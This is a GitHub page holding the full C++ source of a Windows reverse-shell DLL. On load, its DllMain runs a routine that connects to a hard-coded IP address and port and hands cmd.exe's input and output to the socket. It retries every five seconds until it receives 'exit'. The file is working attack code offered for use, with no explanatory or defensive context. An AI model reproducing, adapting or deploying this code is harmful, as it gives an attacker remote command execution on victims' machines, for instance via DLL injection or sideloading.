Basic-win32API-reverse-shell/revshellDLL.cpp at main · 0x0ff537/Basic-win32API-reverse-shell · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
#include <winsock2.h>
#include <windows.h>
#include <ws2tcpip.h>
#pragma comment(lib, "Ws2_32.lib")
#define DEFAULT_BUFLEN 1024

extern __declspec(dllexport) int Run(void);
int Run(void) {

    char host[] = "192.168.188.154";
    int port = 8443;

    while(true) {

        // Create socket
        SOCKET socket;
        sockaddr_in addr;
        WSADATA wsaData;
        WSAStartup(MAKEWORD(2,2), &wsaData);
        socket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);
        addr.sin_family = AF_INET;

        addr.sin_addr.s_addr = inet_addr(host);
        addr.sin_port = htons(port);

        // Connect with host
        if (WSAConnect(socket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL) == SOCKET_ERROR) {
            closesocket(socket);
            WSACleanup();
            continue;
        }
        else {
            char recvData[DEFAULT_BUFLEN];
            memset(recvData, 0, sizeof(recvData));
            int recvCode = recv(socket, recvData, DEFAULT_BUFLEN, 0);
            if (recvCode <= 0) {
                closesocket(socket);
                WSACleanup();
                continue;
            }
            else {
                char proc[] = "cmd.exe";
                STARTUPINFO si;
                PROCESS_INFORMATION pi;
                memset(&si, 0, sizeof(si));
                si.cb = sizeof(si);
                si.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW);
                si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE) socket;
                CreateProcess(NULL, proc, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
                WaitForSingleObject(pi.hProcess, INFINITE);
                CloseHandle(pi.hProcess);
                CloseHandle(pi.hThread);

                memset(recvData, 0, sizeof(recvData));
                int recvCode = recv(socket, recvData, DEFAULT_BUFLEN, 0);
                if (recvCode <= 0) {
                    closesocket(socket);
                    WSACleanup();
                    continue;
                }
                if (strcmp(recvData, "exit\n") == 0) {
                    exit(0);
                }
            }
        }

        Sleep(5000);    // If connection is closed it will try to reconnect
    }
	return 0;
}


BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved ) {

	switch ( fdwReason ) {
			case DLL_PROCESS_ATTACH:
					Run();
					break;
			case DLL_THREAD_ATTACH:
					break;
			case DLL_THREAD_DETACH:
					break;
			case DLL_PROCESS_DETACH:
					break;
			}
	return TRUE;
}